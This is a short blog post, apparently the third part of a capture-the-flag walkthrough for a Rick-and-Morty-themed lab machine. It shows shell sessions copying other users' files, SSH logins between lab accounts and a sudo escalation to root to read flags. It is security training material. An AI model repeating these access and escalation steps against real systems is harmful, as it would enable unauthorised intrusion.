靶机入侵3

Rxw
  2024-09-11 00:02 2024-09-11 00:02 作成   2024-11-11 19:23:50 2024-11-11 19:23:50 更新      422 字  2 分  

还有其他目录:

[Summer@localhost home]$ ls
Morty  RickSanchez  Summer

将Morty和RickSanchez复制到Summer

[Summer@localhost Morty]$ cp journal.txt.zip /home/Summer/
[Summer@localhost Morty]$ cp Safe_Password.jpg /home/Summer/
[Summer@localhost RICKS_SAFE]$ cp safe /home/Summer/
[Summer@localhost home]$ cd Summer/
[Summer@localhost ~]$ ls
FLAG.txt  journal.txt.zip  safe  Safe_Password.jpg

执行./safe 用解出的密码(靶机入侵2的FLAG: {131333})

[Summer@localhost ~]$ ./safe 131333
decrypt:        FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.� @
C:\Users\R>ssh -p 22222 Summer@192.168.100.133
The authenticity of host '[192.168.100.133]:22222 ([192.168.100.133]:22222)' can't be established.
ECDSA key fingerprint is SHA256:rP4CX/V9xNZay9srIUBRq2BFQTnmxUO9cs1F3E9yzg0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.100.133]:22222' (ECDSA) to the list of known hosts.
Summer@192.168.100.133's password:
Last login: Tue Sep 10 21:56:43 2024 from 192.168.100.128
[Summer@localhost ~]$ ls
FLAG.txt  journal.txt.zip  safe  Safe_Password.jpg
[Summer@localhost ~]$ ssh -p 22222  RickSanchez@192.168.100.133
The authenticity of host '[192.168.100.133]:22222 ([192.168.100.133]:22222)' can't be established.
ECDSA key fingerprint is SHA256:rP4CX/V9xNZay9srIUBRq2BFQTnmxUO9cs1F3E9yzg0.
ECDSA key fingerprint is MD5:20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.100.133]:22222' (ECDSA) to the list of known hosts.
RickSanchez@192.168.100.133's password:
Last failed login: Wed Sep 11 02:23:02 AEST 2024 on tty1
There was 1 failed login attempt since the last successful login.
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ ls
RICKS_SAFE  ThisDoesntContainAnyFlags
[RickSanchez@localhost ~]$ sudo su -
[sudo] password for RickSanchez:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]# ls
anaconda-ks.cfg  FLAG.txt
[root@localhost ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points

ROOT密码解法:https://www.freebuf.com/news/173249.html

  • タイトル: 靶机入侵3
  • 作者: Rxw
  • で作成されました : 2024-09-11 00:02:00
  • で更新されました : 2024-11-11 19:23:50
  • リンク: https://rxw2023-github-io.pages.dev/2024/09/11/靶机入侵3/
  • 著作権宣言: この文章は CC BY-NC-SA 4.0 を使用して許可します。
コメント
目次
靶机入侵3